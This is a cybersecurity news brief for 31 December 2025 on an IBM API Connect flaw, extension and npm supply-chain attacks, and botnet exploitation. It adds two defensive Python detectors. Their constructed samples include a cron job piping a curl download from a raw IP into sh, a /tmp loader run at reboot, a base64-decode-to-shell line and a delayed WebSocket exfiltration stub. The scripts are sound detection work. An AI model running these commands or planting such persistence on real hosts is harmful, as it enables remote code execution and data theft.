< ciso brief />
Critical IBM Fix, Extension Supply-Chain Hits, and Active Exploits


Coverage: 31 Dec 2025 (UTC)


Organizations closed the year with a mix of urgent fixes and hard lessons. IBM urged immediate remediation for a critical authentication bypass in API Connect, detailed by The Hacker News, while defenders also contended with supply-chain tampering in browser extensions and active exploitation of web frameworks. Financial losses from compromised crypto projects and fresh regulatory steps rounded out the day’s developments.

Critical fix for IBM API Connect

IBM disclosed a critical flaw in API Connect (CVE-2025-13915, CVSS 9.8) that enables remote authentication bypass across versions 10.0.8.0 through 10.0.8.5 and 10.0.11.0, according to The Hacker News. Interim fixes (ibm-apiconnect--ifix.13195.tar.gz) are available via Fix Central, with guidance to apply them through change management, review logs and authentication events for the exposure window, and rotate credentials where applicable. For environments that cannot patch immediately, IBM advises disabling self-service sign-up on the Developer Portal as a temporary risk reduction. The bulletin notes no evidence of in-the-wild exploitation so far; rapid remediation is still emphasized given the potential exposure of management functions and sensitive API traffic. Why it matters: an authentication bypass on a central gateway can cascade into unauthorized access across every downstream service it fronts.

Supply chains hit extensions and registries

Trust Wallet attributed its Chrome extension compromise to a second Shai‑Hulud supply-chain wave after leaked GitHub secrets exposed a Chrome Web Store API key, enabling attackers to push a malicious update (v2.68) that exfiltrated wallet mnemonics, per The Hacker News. Approximately $8.5 million moved from 2,520 addresses into at least 17 attacker-controlled wallets; users were urged to install version 2.69, and the company opened a case-by-case reimbursement process and tightened release controls. Separately, Koi Security linked the ShadyPanda and GhostPoster campaigns to a broader DarkSpectre operation affecting an estimated 8.8 million users over seven years, with add-ons impersonating conferencing tools to harvest meeting data across platforms like WebEx, Google Meet, Teams, and Zoom. The investigation, summarized by The Hacker News, describes staged trust-building, delayed activation, and real-time exfiltration via WebSockets. Why it matters: trusted plugin channels and extension updates can convert routine software delivery into high-impact data theft at scale.

Researchers also reported a modified strain of the Shai‑Hulud malware tested on the npm package “@vietmoney/react-big-calendar,” with re-obfuscation, new file names (bun_installer.js, environment_source.js), updated exfiltration filenames, and more robust publishing logic, according to The Hacker News. Aikido reported that the package saw limited downloads and no major infections. Analysts noted the actor likely had access to the original source, and highlighted a separate typosquatted Maven package impersonating Jackson that delivered an obfuscated, multi-stage payload. Why it matters: even low-volume tests on developer registries can preface broader supply-chain worms that leverage stolen credentials to poison high-download projects.
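As an added example that is not code from the brief, Aikido or Koi Security, the Python script below walks a directory tree (a project's node_modules or an unpacked browser extension) and reports the indicators the two paragraphs above describe: the two file names attributed to the modified Shai‑Hulud strain, npm lifecycle hooks that run code at install time, long delayed-activation timers, and outbound WebSocket connections to non-local hosts. The sample tree it builds is constructed; the package name "example-pkg", the host "collect.example.invalid", the one-hour delay threshold and the regex rules are assumptions, not published signatures.

```python
"""Scan a directory tree for the supply-chain indicators named in the brief.

Added example, not code from the brief, Aikido or Koi Security. The two file
names come from the npm paragraph; the install-hook, delayed-activation and
WebSocket rules are assumed heuristics, and the sample tree is constructed.
"""
import json
import re
import tempfile
from pathlib import Path

# File names the brief attributes to the modified Shai-Hulud strain.
KNOWN_BAD_FILES = {"bun_installer.js", "environment_source.js"}

# npm lifecycle hooks that execute arbitrary commands at install time.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Outbound WebSocket; group 1 is the URL, group 2 the host[:port] (assumed rule).
WS_RE = re.compile(r"new\s+WebSocket\(\s*['\"](wss?://([^/'\"]+)[^'\"]*)['\"]")
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

# setTimeout/setInterval with a literal delay; flag anything of an hour or more.
DELAY_RE = re.compile(r"set(?:Timeout|Interval)\(\s*[^,]+,\s*(\d+)\s*\)")
ONE_HOUR_MS = 60 * 60 * 1000


def scan_tree(root):
    """Return (kind, relative_path, detail) tuples for every indicator found."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in KNOWN_BAD_FILES:
            findings.append(("known_bad_file", rel, path.name))
        if path.name == "package.json":
            try:
                scripts = json.loads(path.read_text()).get("scripts", {})
            except (ValueError, OSError, AttributeError):
                scripts = {}
            for hook in INSTALL_HOOKS:
                if hook in scripts:
                    findings.append(("install_hook", rel, f"{hook}: {scripts[hook]}"))
        if path.suffix in (".js", ".mjs", ".cjs"):
            text = path.read_text(errors="replace")
            for m in WS_RE.finditer(text):
                host = m.group(2).split(":")[0]
                if host not in LOCAL_HOSTS:
                    findings.append(("external_websocket", rel, m.group(1)))
            for m in DELAY_RE.finditer(text):
                if int(m.group(1)) >= ONE_HOUR_MS:
                    findings.append(("delayed_activation", rel, f"{m.group(1)} ms"))
    return findings


def build_sample_tree(base):
    """Write a constructed sample tree (stand-ins, not real malware) under base."""
    files = {
        "node_modules/example-pkg/package.json": json.dumps({
            "name": "example-pkg", "version": "1.0.0",
            "scripts": {"postinstall": "node bun_installer.js"},
        }),
        "node_modules/example-pkg/bun_installer.js": "// constructed stand-in for a dropper\n",
        "node_modules/left-pad/index.js": "module.exports = (s, n) => s.padStart(n);\n",
        "extension/background.js": (
            "// constructed: wake up three days after install, then stream data out\n"
            "setTimeout(activate, 259200000);\n"
            "function activate() {\n"
            "  const ws = new WebSocket('wss://collect.example.invalid/feed');\n"
            "  ws.onopen = () => ws.send(JSON.stringify(capture()));\n"
            "}\n"
        ),
        # Benign: a dev-reload socket to localhost must not be reported.
        "extension/devtools.js": "const ws = new WebSocket('ws://localhost:8080/reload');\n",
    }
    for rel, content in files.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)


def scan_sample():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for kind, rel, detail in scan_sample():
        print(f"{kind:20} {rel:50} {detail}")
```

Run it against a real checkout with scan_tree("node_modules") or an unpacked extension directory; a localhost WebSocket is deliberately ignored so that dev-reload tooling does not drown out the findings, and a hit on an install hook is worth reading even when the script body looks harmless, since that is where a worm runs.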

Active exploitation and crypto thefts

Researchers tracked the RondoDox botnet exploiting the unauthenticated React2Shell RCE (CVE-2025-55182) against Next.js servers, with CloudSEK observing scans from December 8 and deployments from December 11 and Shadowserver counting more than 94,000 exposed assets, as reported by BleepingComputer. Payloads include a coinminer, a loader that removes competing malware and enforces persistence via crontab, and a Mirai-like binary; prior RondoDox activity targeted other critical flaws, and state-linked operators have also used React2Shell to deliver malware. Analysts recommend auditing and patching Server Actions, isolating IoT devices on separate VLANs, and monitoring processes and persistence indicators such as new or modified cron entries. Meanwhile, Unleash Protocol suffered a governance compromise when an external address gained sufficient multisig signing power to upgrade contracts and siphon assets, leading to an estimated $3.9 million loss across tokens including USDC and WETH; the team paused operations and urged users to avoid its contracts pending confirmation of security, per BleepingComputer. Why it matters: rapid exploitation cycles and concentrated administrative control continue to turn configuration lapses and governance weaknesses into immediate operational and financial impact.
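The crontab persistence mentioned above is the kind of indicator a host check can flag cheaply. The Python below is an added example, not code from the brief, CloudSEK or BleepingComputer: it parses crontab text and reports jobs that re-download a payload into a shell, launch from a staging directory, decode-and-execute, fetch from a raw IP, or run every minute. The rules are assumed heuristics rather than a RondoDox signature, and the sample crontab is constructed (203.0.113.10 is a documentation address; the base64 string decodes to "echo hello").

```python
"""Flag crontab entries that look like re-download / re-launch persistence.

Added example, not code from the brief, CloudSEK or BleepingComputer. The rules
are assumed indicators rather than a signature for RondoDox, and the sample
crontab is constructed (203.0.113.0/24 is a documentation range; the base64
string decodes to "echo hello").
"""
import re

# Each rule is (name, regex over the job line); list order is report order.
RULES = [
    ("download_to_shell", re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b")),
    ("staging_dir", re.compile(r"(?:^|[\s=])(?:/tmp|/dev/shm|/var/tmp)/")),
    ("decode_and_exec", re.compile(r"base64\s+(?:-d|--decode)\b")),
    ("raw_ip_fetch", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")),
    ("every_minute", re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
]

# VAR=value lines (SHELL, PATH, MAILTO ...) are settings, not jobs.
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")

SAMPLE_CRONTAB = """\
# constructed sample in /etc/crontab layout (user field after the schedule)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3     * * *   backup  /usr/local/bin/backup.sh --quiet
* * * * * root curl -s http://203.0.113.10/x.sh | sh
@reboot root /tmp/.x/loader >/dev/null 2>&1
*/5 * * * * nobody echo ZWNobyBoZWxsbw== | base64 -d | sh
"""


def audit_crontab(text):
    """Return [(line_number, [rule names], line)] for every job that trips a rule."""
    hits = []
    for num, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        matched = [name for name, rx in RULES if rx.search(line)]
        if matched:
            hits.append((num, matched, line))
    return hits


def audit_file(path):
    """Audit a crontab file on disk, e.g. /etc/crontab or a /var/spool/cron entry."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_crontab(fh.read())


if __name__ == "__main__":
    for num, names, line in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {num}: {', '.join(names)}\n    {line}")
```

Feed it `crontab -l` output per user as well as /etc/crontab and /etc/cron.d/*; the loader described above only needs one entry to survive a reboot, and an every-minute job is the classic shape of a watchdog that re-launches a miner after it is killed.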

Policy moves and enterprise guardrails

Disney agreed to a $10 million civil penalty to settle claims it violated COPPA by mislabeling child-directed YouTube videos, which allowed the collection of personal data from children under 13 and personalized ads, according to BleepingComputer. Under the order, Disney must alert parents before collecting children’s personal information, ensure accurate “Made for Kids” designations, and prevent unlawful data collection and targeted ads. In a separate move, OFAC removed three individuals associated with the Intellexa Consortium and Predator spyware from its sanctions list without a public rationale, a step that civil-society groups warn may weaken consequences for spyware-linked actors, reported by The Hacker News. Why it matters: enforcement choices and settlement obligations shape how platforms and content owners implement privacy controls and influence the incentives surrounding commercial spyware.

On the enterprise front, Equifax described a security transformation following its 2017 breach, citing nearly $3 billion invested in cloud migration with Google Cloud, refactoring, and elimination of legacy platforms, guided by NIST frameworks and supported by about 300 specialists and incentives tied to security outcomes, detailed by CSO Online. The company reports neutralizing over 15 million threats per day and adapting to AI-enabled attacks with biometric and multi-factor authentication. Complementing this, RSA’s ID IQ Report 2026 shows 90% of organizations encounter problems with passwordless deployments, with security, user experience, and legacy support barriers limiting full coverage; experts recommend securing privileged accounts first, sequencing rollouts by risk, and ensuring phishing-resistant enrollment and recovery, per CSO Online. Why it matters: durable gains come from aligning technology modernization with controls that account for heterogeneous environments and enrollment realities—not from one-step replacements.